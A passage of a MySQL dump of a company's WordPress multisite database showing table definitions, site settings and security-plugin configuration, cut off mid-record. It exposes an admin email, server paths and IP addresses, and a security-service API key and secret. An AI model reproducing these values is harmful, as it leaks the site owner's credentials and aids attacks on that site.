/*!40000 ALTER TABLE `wpdp_registration_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_registration_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_signups`
--

DROP TABLE IF EXISTS `wpdp_signups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_signups` (
  `signup_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `domain` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `active` tinyint(1) NOT NULL DEFAULT '0',
  `activation_key` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `meta` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`signup_id`),
  KEY `activation_key` (`activation_key`),
  KEY `user_email` (`user_email`),
  KEY `user_login_email` (`user_login`,`user_email`),
  KEY `domain_path` (`domain`(140),`path`(51))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_signups`
--

LOCK TABLES `wpdp_signups` WRITE;
/*!40000 ALTER TABLE `wpdp_signups` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_signups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_site`
--

DROP TABLE IF EXISTS `wpdp_site`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_site` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `domain` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `domain` (`domain`(140),`path`(51))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_site`
--

LOCK TABLES `wpdp_site` WRITE;
/*!40000 ALTER TABLE `wpdp_site` DISABLE KEYS */;
INSERT INTO `wpdp_site` (`id`, `domain`, `path`) VALUES (1,'bintara.com.my','/');
/*!40000 ALTER TABLE `wpdp_site` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_sitemeta`
--

DROP TABLE IF EXISTS `wpdp_sitemeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_sitemeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `site_id` bigint(20) NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `site_id` (`site_id`)
) ENGINE=MyISAM AUTO_INCREMENT=34573 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_sitemeta`
--

LOCK TABLES `wpdp_sitemeta` WRITE;
/*!40000 ALTER TABLE `wpdp_sitemeta` DISABLE KEYS */;
INSERT INTO `wpdp_sitemeta` (`meta_id`, `site_id`, `meta_key`, `meta_value`) VALUES (1,1,'site_name','Bintara Solutions Sdn Bhd (BINTARA)'),(2,1,'admin_email','faiz@bintara.com.my'),(3,1,'admin_user_id','1'),(4,1,'registration','none'),(5,1,'upload_filetypes','jpg jpeg png gif mov avi mpg 3gp 3g2 midi mid pdf doc ppt odt pptx docx pps ppsx xls xlsx key mp3 ogg flac m4a wav mp4 m4v webm ogv flv'),(6,1,'blog_upload_space','100'),(7,1,'fileupload_maxk','1500'),(8,1,'site_admins','a:1:{i:0;s:12:\"pentadbirweb\";}'),(9,1,'allowedthemes','a:1:{s:8:\"onepress\";b:1;}'),(10,1,'illegal_names','a:9:{i:0;s:3:\"www\";i:1;s:3:\"web\";i:2;s:4:\"root\";i:3;s:5:\"admin\";i:4;s:4:\"main\";i:5;s:6:\"invite\";i:6;s:13:\"administrator\";i:7;s:5:\"files\";i:8;s:4:\"blog\";}'),(11,1,'wpmu_upgrade_site','44719'),(12,1,'welcome_email','Howdy USERNAME,\r\n\r\nYour new SITE_NAME site has been successfully set up at:\r\nBLOG_URL\r\n\r\nYou can log in to the administrator account with the following information:\r\n\r\nUsername: USERNAME\r\nPassword: PASSWORD\r\nLog in here: BLOG_URLwp-login.php\r\n\r\nWe hope you enjoy your new site. Thanks!\r\n\r\n--The Team @ SITE_NAME'),(13,1,'first_post','Welcome to %s. This is your first post. Edit or delete it, then start blogging!'),(14,1,'siteurl','https://bintara.com.my/'),(15,1,'add_new_users','0'),(16,1,'upload_space_check_disabled','1'),(17,1,'subdomain_install','0'),(18,1,'global_terms_enabled','0'),(19,1,'ms_files_rewriting','0'),(20,1,'initial_db_version','43764'),(21,1,'active_sitewide_plugins','a:0:{}'),(22,1,'WPLANG',''),(43,1,'recently_activated','a:0:{}'),(194,1,'registrationnotification','yes'),(195,1,'welcome_user_email','Howdy USERNAME,\r\n\r\nYour new account is set up.\r\n\r\nYou can log in with the following information:\r\nUsername: USERNAME\r\nPassword: PASSWORD\r\nLOGINLINK\r\n\r\nThanks!\r\n\r\n--The Team @ SITE_NAME'),(31,1,'user_count','3'),(32,1,'blog_count','1'),(35,1,'can_compress_scripts','1'),(448,1,'menu_items','a:0:{}'),(449,1,'first_page',''),(450,1,'first_comment',''),(451,1,'first_comment_url',''),(452,1,'first_comment_author',''),(453,1,'limited_email_domains',''),(454,1,'banned_email_domains',''),(455,1,'new_admin_email','faiz@bintara.com.my'),(456,1,'first_comment_email',''),(510,1,'itsec_active_modules','a:10:{s:9:\"ban-users\";b:1;s:6:\"backup\";b:1;s:11:\"brute-force\";b:1;s:19:\"network-brute-force\";b:1;s:16:\"wordpress-tweaks\";b:1;s:11:\"file-change\";b:1;s:16:\"multisite-tweaks\";b:1;s:13:\"404-detection\";b:1;s:3:\"ssl\";b:1;s:13:\"system-tweaks\";b:1;}'),(50,1,'classic-editor-allow-sites','disallow'),(239,1,'wordfence_syncingAttackData','0'),(240,1,'wordfence_lastSyncAttackData','1571976462'),(72,1,'disable_comments_options','a:5:{s:19:\"disabled_post_types\";a:0:{}s:17:\"remove_everywhere\";b:0;s:9:\"permanent\";b:0;s:16:\"extra_post_types\";b:0;s:10:\"db_version\";i:6;}'),(156,1,'wordfence_version','7.4.0'),(157,1,'wordfence_case','1'),(489,1,'itsec-storage','a:11:{s:6:\"global\";a:33:{s:15:\"lockout_message\";s:5:\"error\";s:20:\"user_lockout_message\";s:64:\"You have been locked out due to too many invalid login attempts.\";s:25:\"community_lockout_message\";s:77:\"Your IP address has been flagged as a threat by the iThemes Security network.\";s:9:\"blacklist\";b:1;s:15:\"blacklist_count\";i:2;s:16:\"blacklist_period\";i:7;s:14:\"lockout_period\";i:6000;s:18:\"lockout_white_list\";a:1:{i:0;s:11:\"60.53.43.49\";}s:12:\"log_rotation\";i:60;s:17:\"file_log_rotation\";i:180;s:8:\"log_type\";s:4:\"both\";s:12:\"log_location\";s:81:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/logs\";s:8:\"log_info\";s:51:\"bintara-solutions-sd-uyEQoh5oBJPN2H18wmIcGZvu40HzwX\";s:14:\"allow_tracking\";b:0;s:11:\"write_files\";b:1;s:10:\"nginx_file\";s:51:\"/home/norfaiz/public_html/bintara.com.my/nginx.conf\";s:24:\"infinitewp_compatibility\";b:0;s:11:\"did_upgrade\";b:0;s:9:\"lock_file\";b:0;s:5:\"proxy\";s:9:\"automatic\";s:12:\"proxy_header\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"hide_admin_bar\";b:0;s:16:\"show_error_codes\";b:0;s:19:\"show_security_check\";b:0;s:5:\"build\";i:4114;s:13:\"initial_build\";i:4112;s:20:\"activation_timestamp\";i:1545735283;s:11:\"cron_status\";i:1;s:8:\"use_cron\";b:1;s:14:\"cron_test_time\";i:1572014880;s:19:\"enable_grade_report\";b:0;s:10:\"server_ips\";a:1:{i:0;s:12:\"103.6.198.69\";}s:13:\"feature_flags\";a:0:{}}s:21:\"password-requirements\";a:2:{s:20:\"enabled_requirements\";a:1:{s:8:\"strength\";b:1;}s:20:\"requirement_settings\";a:1:{s:8:\"strength\";a:1:{s:4:\"role\";s:13:\"administrator\";}}}s:16:\"wordpress-tweaks\";a:13:{s:18:\"wlwmanifest_header\";b:0;s:14:\"edituri_header\";b:0;s:12:\"comment_spam\";b:0;s:11:\"file_editor\";b:1;s:14:\"disable_xmlrpc\";i:0;s:22:\"allow_xmlrpc_multiauth\";b:0;s:8:\"rest_api\";s:15:\"restrict-access\";s:12:\"login_errors\";b:0;s:21:\"force_unique_nicename\";b:0;s:27:\"disable_unused_author_pages\";b:0;s:16:\"block_tabnapping\";b:0;s:21:\"valid_user_login_type\";s:4:\"both\";s:26:\"patch_thumb_file_traversal\";b:1;}s:19:\"network-brute-force\";a:5:{s:7:\"api_key\";s:32:\"Go4mPxM4hK0Z07a74W6LjV3S4iC3Kl3d\";s:10:\"api_secret\";s:128:\"0FxAQWL784Jfn5QOk5GbMw9m4Q1dHTr70bDwbyW0U6Ii1sR40dOAWI79hnD5hE0XgS1I66d7506VP8WJhxrGRLiU72haFKrimvkc2HOmffP9b1XplF4dWjNJ78qt7821\";s:10:\"enable_ban\";b:1;s:13:\"updates_optin\";b:1;s:7:\"api_nag\";b:0;}s:6:\"backup\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1571801475;}s:11:\"file-change\";a:6:{s:9:\"file_list\";a:0:{}s:5:\"types\";a:39:{i:0;s:4:\".log\";i:1;s:3:\".mo\";i:2;s:3:\".po\";i:3;s:4:\".bmp\";i:4;s:4:\".gif\";i:5;s:4:\".ico\";i:6;s:4:\".jpe\";i:7;s:5:\".jpeg\";i:8;s:4:\".jpg\";i:9;s:4:\".png\";i:10;s:4:\".psd\";i:11;s:4:\".raw\";i:12;s:4:\".svg\";i:13;s:4:\".tif\";i:14;s:5:\".tiff\";i:15;s:4:\".aif\";i:16;s:5:\".flac\";i:17;s:4:\".m4a\";i:18;s:4:\".mp3\";i:19;s:4:\".oga\";i:20;s:4:\".ogg\";i:22;s:3:\".ra\";i:23;s:4:\".wav\";i:24;s:4:\".wma\";i:25;s:4:\".asf\";i:26;s:4:\".avi\";i:27;s:4:\".mkv\";i:28;s:4:\".mov\";i:29;s:4:\".mp4\";i:30;s:4:\".mpe\";i:31;s:5:\".mpeg\";i:32;s:4:\".mpg\";i:33;s:4:\".ogv\";i:34;s:3:\".qt\";i:35;s:3:\".rm\";i:36;s:4:\".vob\";i:37;s:5:\".webm\";i:38;s:3:\".wm\";i:39;s:4:\".wmv\";}s:15:\"expected_hashes\";a:2:{s:54:\"/home/norfaiz/public_html/bintara.com.my/wp-config.php\";s:32:\"5dbd367274687c865a5d24a8e8ecf015\";s:50:\"/home/norfaiz/public_html/bintara.com.my/.htaccess\";s:32:\"e077568bb607f1247e17808a5c13d7e8\";}s:9:\"last_scan\";i:495;s:12:\"notify_admin\";b:1;s:12:\"show_warning\";b:0;}s:19:\"notification-center\";a:8:{s:10:\"from_email\";s:0:\"\";s:18:\"default_recipients\";a:1:{s:9:\"user_list\";a:1:{i:0;s:18:\"role:administrator\";}}s:13:\"notifications\";a:4:{s:6:\"backup\";a:2:{s:7:\"subject\";N;s:10:\"email_list\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}}s:11:\"file-change\";a:4:{s:7:\"enabled\";b:1;s:7:\"subject\";N;s:14:\"recipient_type\";s:7:\"default\";s:9:\"user_list\";a:1:{i:0;s:18:\"role:administrator\";}}s:6:\"digest\";a:5:{s:7:\"subject\";N;s:8:\"schedule\";s:5:\"daily\";s:14:\"recipient_type\";s:7:\"default\";s:9:\"user_list\";a:1:{i:0;s:18:\"role:administrator\";}s:7:\"enabled\";b:0;}s:7:\"lockout\";a:4:{s:7:\"enabled\";b:1;s:7:\"subject\";N;s:14:\"recipient_type\";s:7:\"default\";s:9:\"user_list\";a:1:{i:0;s:18:\"role:administrator\";}}}s:9:\"last_sent\";a:1:{s:6:\"digest\";i:1569015629;}s:4:\"data\";a:1:{s:6:\"digest\";a:0:{}}s:9:\"resend_at\";a:0:{}s:12:\"admin_emails\";a:0:{}s:15:\"last_mail_error\";s:0:\"\";}s:9:\"ban-users\";a:4:{s:7:\"default\";b:1;s:16:\"enable_ban_lists\";b:1;s:9:\"host_list\";a:0:{}s:10:\"agent_list\";a:0:{}}s:11:\"brute-force\";a:4:{s:17:\"max_attempts_host\";i:3;s:17:\"max_attempts_user\";i:4;s:12:\"check_period\";i:600;s:14:\"auto_ban_admin\";b:1;}s:3:\"ssl\";a:3:{s:11:\"require_ssl\";s:7:\"enabled\";s:8:\"frontend\";i:0;s:5:\"admin\";b:0;}s:13:\"system-tweaks\";a:10:{s:13:\"protect_files\";b:1;s:18:\"directory_browsing\";b:1;s:15:\"request_methods\";b:1;s:24:\"suspicious_query_strings\";b:1;s:16:\"long_url_strings\";b:1;s:11:\"uploads_php\";b:1;s:22:\"non_english_characters\";b:0;s:17:\"write_permissions\";b:0;s:11:\"plugins_php\";b:0;s:10:\"themes_php\";b:0;}}'),(238,1,'wordfence_syncAttackDataAttempts','0'),(79,1,'wpseo_ms','a:10:{s:6:\"access\";s:5:\"admin\";s:11:\"defaultblog\";s:0:\"\";s:26:\"allow_disableadvanced_meta\";b:1;s:25:\"allow_onpage_indexability\";b:1;s:29:\"allow_content_analysis_active\";b:1;s:29:\"allow_keyword_analysis_active\";b:1;s:27:\"allow_enable_admin_bar_menu\";b:1;s:32:\"allow_enable_cornerstone_content\";b:1;s:24:\"allow_enable_xml_sitemap\";b:1;s:30:\"allow_enable_text_link_counter\";b:1;}'),(198,1,'updraftplus-addons_siteid','2f9882cb91d90a53542bf1189bf3b689'),(11538,1,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1573736935;s:7:\"checked\";a:1:{s:8:\"onepress\";s:5:\"2.2.4\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}'),(488,1,'itsec_cron','a:2:{s:6:\"single\";a:2:{s:11:\"file-change\";a:2:{s:32:\"8b718509cfad2dc5b8f246a2201bac8e\";a:1:{s:4:\"data\";a:4:{s:4:\"step\";s:9:\"get-files\";s:5:\"chunk\";s:6:\"themes\";s:10:\"loop_start\";i:1547176661;s:9:\"loop_item\";i:5;}}s:32:\"753252edb87d64ac906b38cfe359c363\";a:1:{s:4:\"data\";a:4:{s:4:\"step\";s:9:\"get-files\";s:5:\"chunk\";s:5:\"admin\";s:10:\"loop_start\";i:1569074500;s:9:\"loop_item\";i:1;}}}s:16:\"file-change-fast\";a:1:{s:32:\"f81f095c9229bfc53dba62a3ff93cd1e\";a:1:{s:4:\"data\";a:4:{s:4:\"step\";s:13:\"compare-files\";s:5:\"chunk\";s:6:\"others\";s:10:\"loop_start\";i:1545793570;s:9:\"loop_item\";i:10;}}}}s:9:\"recurring\";a:4:{s:17:\"purge-log-entries\";a:1:{s:4:\"data\";a:0:{}}s:14:\"purge-lockouts\";a:1:{s:4:\"data\";a:0:{}}s:11:\"clear-locks\";a:1:{s:4:\"data\";a:0:{}}s:6:\"backup\";a:1:{s:4:\"data\";a:0:{}}}}'),(490,1,'itsec_temp_whitelist_ip','a:1:{s:15:\"203.106.173.105\";i:1572071782;}'),(32186,1,'jetpack_sync_settings_network_disable','0'),(525,1,'itsec_file_change_latest','a:5:{s:5:\"added\";a:61:{s:39:\"wp-content/updraft/log.b45c3f15636f.txt\";a:5:{s:1:\"d\";i:1547033459;s:1:\"h\";s:32:\"bf3d7021d59fceaec046ce209e019cf7\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:97:\"wp-content/updraft/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-themes.zip\";a:5:{s:1:\"d\";i:1547032161;s:1:\"h\";s:32:\"1d7727d3313fec4340d0947ec474e606\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:92:\"wp-content/updraft/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-db.gz\";a:5:{s:1:\"d\";i:1547032884;s:1:\"h\";s:32:\"dd73a93ebbe446923c9d2e911e1ed870\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:97:\"wp-content/updraft/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-others.zip\";a:5:{s:1:\"d\";i:1547032878;s:1:\"h\";s:32:\"7e62cb01b6cf58a13cbb505b5e2740ea\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/updraft/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-uploads.zip\";a:5:{s:1:\"d\";i:1547032868;s:1:\"h\";s:32:\"43928c7b82378802f41aa4f3f505af1b\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/updraft/backup_2019-01-09-1903_Bintara_Solutions_Sdn_Bhd_BINTA_b45c3f15636f-plugins.zip\";a:5:{s:1:\"d\";i:1547032158;s:1:\"h\";s:32:\"d786baeb708a72443eaa77eca6f45d72\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:99:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/editor/style.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"59d50c0db9d21f6a092e347714520c01\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:107:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/editor/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"ab6108c21a2a1d14df1dc9f0d49827d7\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:103:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/editor/style-rtl.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"54a9556e4830fb69925ad216617c5aad\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:103:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/editor/style.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"c16f103ecb87682ba3b40546bd0568ed\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:106:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/block-library/style.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"b57c9841759fb679653e42162a9218c7\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:114:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/block-library/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"d853d590816c08875d95849875e42648\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:110:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/block-library/style-rtl.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"76adcd3fae217c56e6fc3ff97257a3b4\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:110:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/block-library/style.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"eb1a96949e0ea0d08033d3f941bf1f3e\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:103:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/components/style.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"ceaf3c35802604ba2964561a5c15cafd\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:111:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/components/style-rtl.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"c1b549e7ed316bf5a1d38d545923230e\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:107:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/components/style-rtl.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"23207926b6554158a37d95234a23414f\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:107:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/css/dist/components/style.min.css\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"50242e6ba592897625683280e2cc183d\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:94:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/core-data.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"d9d282309deba0fae8e0d9e1390bb2a0\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:90:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/hooks.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"d1495ca6445d4be01ea2c604ffad2c91\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:95:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/blocks.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"f39f38665ac6b784630b3f652375580b\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:89:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/data.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"8a70f593b4e1c7255d1477a5b943de61\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/block-library.js\";a:5:{s:1:\"d\";i:1547081509;s:1:\"h\";s:32:\"f8dd79f25b1b88b0dac790416138a00a\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:95:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/editor.min.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"6191d588e62256e25a4e735c318b5ab0\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:92:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/url.min.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"4d6c78efb41747c864b4dc24c5c7f939\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:88:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/url.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"026d66222af818d4aab9a2059165b064\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:97:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/viewport.min.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"d7932636c66dd528dc7fd98caa7a607e\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/edit-post.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"7423dbf596bd505ff600ab11c69d15c2\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:93:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/data.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"07c02f5b612470483def32a975cd96cf\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:92:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/dom.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"a2f3f8a8d0643c3fef95f4c59b78472a\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:95:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/components.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"51965929307297ed0ef5e9ad07709dfa\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:94:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/hooks.min.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"372901e50eb2d47eb24cb57a62aaa7f2\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:99:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/components.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"84cdfb957f060ba494e4a5178672c106\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:93:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/viewport.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"ea43d42792f43b764449b2618693c069\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:91:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/editor.js\";a:5:{s:1:\"d\";i:1547081516;s:1:\"h\";s:32:\"dc9f3b6295f11d544425284077dbe77f\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:94:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/edit-post.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"3a8f886d748dd1bc6390f29b8b1cc909\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:98:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/core-data.min.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"73143e8195b1151c70875f1f7717e778\";s:1:\"t\";s:1:\"a\";s:1:\"s\";i:1;s:1:\"p\";s:7:\"Unknown\";}s:88:\"wp-content/upgrade/wordpress-5.0.3-partial-2-qM4Qki/wordpress/wp-includes/js/dist/dom.js\";a:5:{s:1:\"d\";i:1547081512;s:1:\"h\";s:32:\"0da7a6c0a8988d47b4cbc451ed68e